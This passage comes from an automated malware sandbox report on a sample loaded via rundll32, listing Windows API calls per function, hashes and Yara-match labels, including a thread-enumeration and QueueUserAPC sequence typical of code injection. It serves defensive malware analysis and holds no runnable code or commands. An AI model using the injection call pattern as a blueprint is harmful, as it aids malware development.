                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B7348D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                          • String ID:
                          • API String ID: 3873609385-0
                          • Opcode ID: f0e6a68ac107ba640785c82094f849583284b7e1d7d87cafc07665fa24563e37
                          • Instruction ID: 0e305ae57da6a7abcf9476b1b6bfd4ca3d1cdb1e0933d803977d5e90a00e89f7
                          • Opcode Fuzzy Hash: f0e6a68ac107ba640785c82094f849583284b7e1d7d87cafc07665fa24563e37
                          • Instruction Fuzzy Hash: 3911C071150218BFD3222A64AC8EE7B3F9EEB02365B001465F916D3180DE217C49E6B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 05B68030
                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 05B68043
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B68066
                          • StrTrimA.SHLWAPI(00000001,?), ref: 05B68075
                          • lstrlen.KERNEL32(00000000), ref: 05B680AA
                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05B680BD
                          • lstrcpy.KERNEL32(00000004,00000000), ref: 05B680DB
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B680FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                          • String ID: W
                          • API String ID: 1974185407-655174618
                          • Opcode ID: 33117e9d5581e4b20abd88eb5753733ce3168702b7f942e7c4f4ea10ba7dda9c
                          • Instruction ID: 5f1eb59c12970eebfe0d8b44659ce607441a3145c683e929289d27de5f82ec21
                          • Opcode Fuzzy Hash: 33117e9d5581e4b20abd88eb5753733ce3168702b7f942e7c4f4ea10ba7dda9c
                          • Instruction Fuzzy Hash: 88315C75910218FFCB119BA8CC49EAA7FFAFF09750F245096B90597240EA78B941DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05FBC1E8,00000000,00000000,00000000,?), ref: 05B73CBA
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CC9
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CD6
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 05B73CEE
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CFA
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B73D16
                          • wsprintfA.USER32 ref: 05B73DF8
                          • memcpy.NTDLL(00000000,00004000,?), ref: 05B73E45
                          • InterlockedExchange.KERNEL32(05B8A128,00000000), ref: 05B73E63
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B73EA4
                            • Part of subcall function 05B7E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 05B7E3F6
                            • Part of subcall function 05B7E3CD: memcpy.NTDLL(00000000,?,?), ref: 05B7E409
                            • Part of subcall function 05B7E3CD: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B7E41A
                            • Part of subcall function 05B7E3CD: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B7E42F
                            • Part of subcall function 05B7E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B7E467
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                          • String ID:
                          • API String ID: 4198405257-0
                          • Opcode ID: e8739fbef2737f8212ade432b57eb18a05ac2945d451b068a1d961cd30df8e3d
                          • Instruction ID: ea93d5a795c237c5e0ab9d8ebc1f7eae94ebb8672fe9a9a73544a8802d329528
                          • Opcode Fuzzy Hash: e8739fbef2737f8212ade432b57eb18a05ac2945d451b068a1d961cd30df8e3d
                          • Instruction Fuzzy Hash: F7615C71A1020AEFCF10DFA5DC85EAA7BFAFB04300F1544AAF91697250DB34BA55DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,05B69100,?), ref: 05B78D13
                          • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D1D
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D46
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D54
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D62
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D70
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D7E
                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B78D8C
                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 05B78DB6
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,05B69100,?), ref: 05B78E37
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                          • String ID:
                          • API String ID: 1792504554-0
                          • Opcode ID: 512b082cc593af53d7791cff36191d3580ebfe50e337b4dd790ebb62799d433f
                          • Instruction ID: 879e264ba331c18b2ffd4f24cde0b0d7f24be6f4a0ed28ebc7d65dd7e7b78c4c
                          • Opcode Fuzzy Hash: 512b082cc593af53d7791cff36191d3580ebfe50e337b4dd790ebb62799d433f
                          • Instruction Fuzzy Hash: DB418471A1011CEFCB00EFA8D8CADB97BF9FB09214B6554A6F219DB140D734B905CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B62F91: memset.NTDLL ref: 05B62FB3
                            • Part of subcall function 05B62F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B6305D
                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 05B7E903
                          • CloseHandle.KERNEL32(?), ref: 05B7E90F
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B7E91F
                          • lstrlenW.KERNEL32(00000000), ref: 05B7E928
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B7E939
                          • wcstombs.NTDLL ref: 05B7E948
                          • lstrlen.KERNEL32(?), ref: 05B7E955
                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 05B7E994
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7E9A7
                          • DeleteFileW.KERNEL32(?), ref: 05B7E9B4
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                          • String ID:
                          • API String ID: 2256351002-0
                          • Opcode ID: 44bb24a9188466881da58c21f2ef2c6e5713b93460defe5696645129fc52309e
                          • Instruction ID: 84c19ca8b38bb713bd04370353bcfad2f8dc440c59b73a56efa822504bfc7340
                          • Opcode Fuzzy Hash: 44bb24a9188466881da58c21f2ef2c6e5713b93460defe5696645129fc52309e
                          • Instruction Fuzzy Hash: 65310636610209BBDF21AFA5DD4ADAF7FBAFF45311F0000A5F912A6190DB31A915DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetTickCount.KERNEL32 ref: 05B7B9F9
                          • CreateFileW.KERNEL32(05B70971,80000000,00000003,05B8A1E8,00000003,00000000,00000000,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA16
                          • GetLastError.KERNEL32(?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BABE
                            • Part of subcall function 05B8087A: lstrlen.KERNEL32(?,00000000,05B7BA3E,00000027,05B8A1E8,?,00000000,?,?,05B7BA3E,?,00000001,?,05B70971,00000000,?), ref: 05B808B0
                            • Part of subcall function 05B8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 05B808D4
                            • Part of subcall function 05B8087A: lstrcat.KERNEL32(00000000,00000000), ref: 05B808DC
                          • GetFileSize.KERNEL32(05B70971,00000000,?,00000001,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA49
                          • CreateFileMappingA.KERNEL32(05B70971,05B8A1E8,00000002,00000000,00000000,05B70971), ref: 05B7BA5D
                          • lstrlen.KERNEL32(05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA79
                          • lstrcpy.KERNEL32(?,05B70971), ref: 05B7BA89
                          • GetLastError.KERNEL32(?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BA91
                          • HeapFree.KERNEL32(00000000,05B70971,?,05B70971,00000000,?,05B6C1F8,00000000), ref: 05B7BAA4
                          • CloseHandle.KERNEL32(05B70971,?,00000001,?,05B70971), ref: 05B7BAB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                          • String ID:
                          • API String ID: 194907169-0
                          • Opcode ID: 520a06d456c8fe67af1c8521c4e047858d1665b6ed86732142daba3b18644e0d
                          • Instruction ID: 608b62cf081d18491e1007918032d3ef294557faf56efafb92effe351ebfed31
                          • Instruction Fuzzy Hash: F721FE71900608FFDB20AFA4D849AAD7FBAFF04354F109469F555E7290DB30AA54DF90
                          Uniqueness Score: -1.00%

                          APIs
                          • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05B6EE2A
                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05B6EE36
                          • GetModuleHandleA.KERNEL32(?,05FB978E,00000000,?,00000000), ref: 05B6EE56
                          • GetProcAddress.KERNEL32(00000000), ref: 05B6EE5D
                          • Thread32First.KERNEL32(?,0000001C), ref: 05B6EE6D
                          • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05B6EE88
                          • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 05B6EE99
                          • CloseHandle.KERNEL32(00000000), ref: 05B6EEA0
                          • Thread32Next.KERNEL32(?,0000001C), ref: 05B6EEA9
                          • CloseHandle.KERNEL32(?), ref: 05B6EEB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                          • String ID:
                          • API String ID: 2341152533-0
                          • Opcode ID: bcadf475fc6652e8efe03342e4dd48a469b7ab761682f85e7cc5f680b54f4ae3
                          • Instruction ID: 72c4c923037239da813b411fc3589daf660d43733656bbb6d1b94bd1cbc9e606
                          • Instruction Fuzzy Hash: AB212472900108BFDF11AFA4DC89DAE7BAEFB08254B10416AFA01A7190DB34F945CBA0
                          Uniqueness Score: -1.00%

                          APIs
                          • SetEvent.KERNEL32(00000000,?,05B7507B), ref: 05B6DC56
                            • Part of subcall function 05B75D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 05B75D59
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,05B7507B), ref: 05B6DC76
                          • CloseHandle.KERNEL32(00000000,?,05B7507B), ref: 05B6DC7F
                          • CloseHandle.KERNEL32(00000000,?,?,05B7507B), ref: 05B6DC89
                          • RtlEnterCriticalSection.NTDLL(?), ref: 05B6DC91
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 05B6DCA9
                          • Sleep.KERNEL32(000001F4), ref: 05B6DCB8
                          • CloseHandle.KERNEL32(00000000), ref: 05B6DCC5
                          • LocalFree.KERNEL32(?), ref: 05B6DCD0
                          • RtlDeleteCriticalSection.NTDLL(?), ref: 05B6DCDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                          • String ID:
                          • API String ID: 1408595562-0
                          • Opcode ID: 1dee7b55717646d0169c8c387aa2790edb0696a86a76402a01acc7234d51d884
                          • Instruction ID: d3507db748bc3b5e8359fea85b66cc2720729ab9257d19226678eab3f1de1c8b
                          • Instruction Fuzzy Hash: 1411857121071AEFCB30AB65DD59D6ABBAAFF047403140968F29283490DF79F840CBA0
                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,05B63DA2,00000000,00000001,?,?,?), ref: 05B6DD92
                          • lstrlen.KERNEL32(?), ref: 05B6DDA2
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DDD6
                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 05B6DE01
                          • memcpy.NTDLL(00000000,?,?), ref: 05B6DE20
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6DE81
                          • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 05B6DEA3
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Allocatelstrlenmemcpy$Free
                          • String ID: W
                          • API String ID: 3204852930-655174618
                          • Opcode ID: 4de0e293e57e511325f13f23bd6d6a18155adc5d821fc5d98213dc4b9022eb30
                          • Instruction ID: 13335fb22c2977f20b65f41dd2c58898534f413c792337e4cfe6362a4efb07e2
                          • Instruction Fuzzy Hash: 1E413CB1A0120AEFCF11DF95CC84AAE7BB9FF14244F1444A9F915A7210E735EA54DFA0
                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                            • Part of subcall function 05B6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 05B6A153
                          • wsprintfA.USER32 ref: 05B6A181
                          • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 05B6A1DF
                          • GetLastError.KERNEL32 ref: 05B6A1F6
                          • ResetEvent.KERNEL32(?), ref: 05B6A20A
                          • ResetEvent.KERNEL32(?), ref: 05B6A20F
                          • GetLastError.KERNEL32 ref: 05B6A227
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                          • String ID: `
                          • API String ID: 2276693960-1850852036
                          • Opcode ID: 8eec1035d896369b83cd0c3856398e72ef79944c3adef1eaf84d42b16c07822f
                          • Instruction ID: d8432aea6f70de923ca0b65da4ceac7fc90e7aedbe862a97cbfbc1fbc1cf1fe3
                          • Instruction Fuzzy Hash: 97413871500209EFDF21EFA5DD89AAEBBB9FF05310F104466F911A2250EB35FA54CBA1
                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                          • memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                          • memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                          • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                          • GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                          • String ID: (
                          • API String ID: 2237239663-3887548279
                          • Opcode ID: 5bd25cb466da976ef0d8317f584d090b199fa60f9d69560d39e236c1099d10ec
                          • Instruction ID: 0d0cabb167528e19aba277b62361ac1b2f480c76120add9cf93d9da005aebdff
                          • Instruction Fuzzy Hash: 4931A036900209BFDB21DF95DC45AAB7FB9FB44750F144829FD0AA3240D634FA54DBA0
                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B77777
                          • memset.NTDLL ref: 05B7778B
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • GetCurrentThreadId.KERNEL32 ref: 05B77818
                          • GetCurrentThread.KERNEL32 ref: 05B7782B
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B778D2
                          • Sleep.KERNEL32(0000000A), ref: 05B778DC
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B77902
                          • HeapFree.KERNEL32(00000000,?), ref: 05B77930
                          • HeapFree.KERNEL32(00000000,00000018), ref: 05B77943
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                          • String ID:
                          • API String ID: 1146182784-0
                          • Opcode ID: 63f5e1737c59ef5e4199792497ddbd537ac3a73a5af435ed47f986fb4b3eb6c2
                          • Instruction ID: d216f374e476048130d6921f780848736d45f97fa9370541e982840766885ab7
                          • Instruction Fuzzy Hash: 49517AB5618305EFD710EF64D88586ABBEAFB88254F100C6EF5A5D7210DB30F948DB92
                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 05B7284F
                          • memset.NTDLL ref: 05B72860
                          • lstrcmpi.KERNEL32(?,?), ref: 05B728A0
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B728CC
                          • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05B78974), ref: 05B728E0
                          • memset.NTDLL ref: 05B728ED
                          • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B72906
                          • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05B72929
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,05B78974), ref: 05B72946
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                          • String ID:
                          • API String ID: 694413484-0
                          • Opcode ID: cba2bc46b110bc1bec9f79af6ad46d57a2834f08041d3781a17eb93c222bd248
                          • Instruction ID: 911b6b73c459ab8730083998492ce2f037819372976ee9724b3b684a6d3a88d6
                          • Instruction Fuzzy Hash: D6418E76E00219BFDB109FA4CC84BADBBBAFF08314F5440A9F525A7250DB35BA45DB50
                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7C9CC
                          • lstrlen.KERNEL32(?), ref: 05B7C9D4
                          • lstrlen.KERNEL32(?), ref: 05B7CA3F
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CA6A
                          • memcpy.NTDLL(00000000,00000002,?), ref: 05B7CA7B
                          • memcpy.NTDLL(00000000,?,?), ref: 05B7CA91
                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05B7CAA3
                          • memcpy.NTDLL(00000000,05B853E8,00000002,00000000,?,?,00000000,?,?), ref: 05B7CAB6
                          • memcpy.NTDLL(00000000,?,00000002), ref: 05B7CACB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: memcpy$lstrlen$AllocateHeap
                          • String ID:
                          • API String ID: 3386453358-0
                          • Opcode ID: 96be5bf2a3e62f187e69d6ec965fa0b7eacbd98ba6c76aa0dab0b55f373de7e2
                          • Instruction ID: a0c5aaf6b0f1cec22b466516f55e607b78f350c0c0d4a40178138dc139a6618c
                          • Instruction Fuzzy Hash: 26413E76D0020DEBCF10DFA8CC84AAEBFB9FF48215F14409AE915A7245E771EA50DB90
                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B770C3: RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B770CB
                            • Part of subcall function 05B770C3: RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B770E0
                            • Part of subcall function 05B770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 05B770F9
                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B660AC
                          • lstrlen.KERNEL32(00000008,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660BB
                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 05B660CD
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660DD
                          • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,05B7F140,00000000,00000000,-00000008), ref: 05B660EF
                          • lstrcpy.KERNEL32(00000020), ref: 05B66121
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B6612D
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B66185
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 3746371830-0
                          • Opcode ID: d5ea70b83fa0f4c536275801c506f37e14a4e15a33076819be46a3f57c0c2959
                          • Instruction ID: a1aa6607efbe412b3519ace4ea95d943765e9cc241ab02a5dab13c423ae28fb8
                          • Instruction Fuzzy Hash: E7414671910705EFCB219F58C849B6ABBBAFF08314F20A55AF80997241DB78B954DB90
                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B75119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B7514B
                            • Part of subcall function 05B75119: HeapFree.KERNEL32(00000000,00000000,?,?,05B7FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 05B75170
                            • Part of subcall function 05B779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,05B7FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 05B779DC
                            • Part of subcall function 05B779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,05B7FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05B77A2F
                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FC63
                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FC6B
                          • lstrlen.KERNEL32(?), ref: 05B7FC75
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7FC8A
                          • wsprintfA.USER32 ref: 05B7FCC6
                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 05B7FCE5
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7FCFA
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7FD07
                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 05B7FD15
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                          • String ID:
                          • API String ID: 168057987-0
                          • Opcode ID: 7235c1ba7d52b5ccbeb71a2ffeff12e29a569af60aa56a3ec31232367da84ebd
                          • Instruction ID: f2d4df2a132f0304af9d7a3d73fd01322b125baef8c358ec6df45f8b2b4163b6
                          • Instruction Fuzzy Hash: 3F319E31614319BFCB21AF64DC46E6BBFEAFF48210F00086AF954A7151DB70E818DB96
                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                          • GetLastError.KERNEL32 ref: 05B6F3E5
                          • WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                          • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                          • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                          • SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                          • GetLastError.KERNEL32 ref: 05B6F483
                          • CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                          • String ID:
                          • API String ID: 2864405449-0
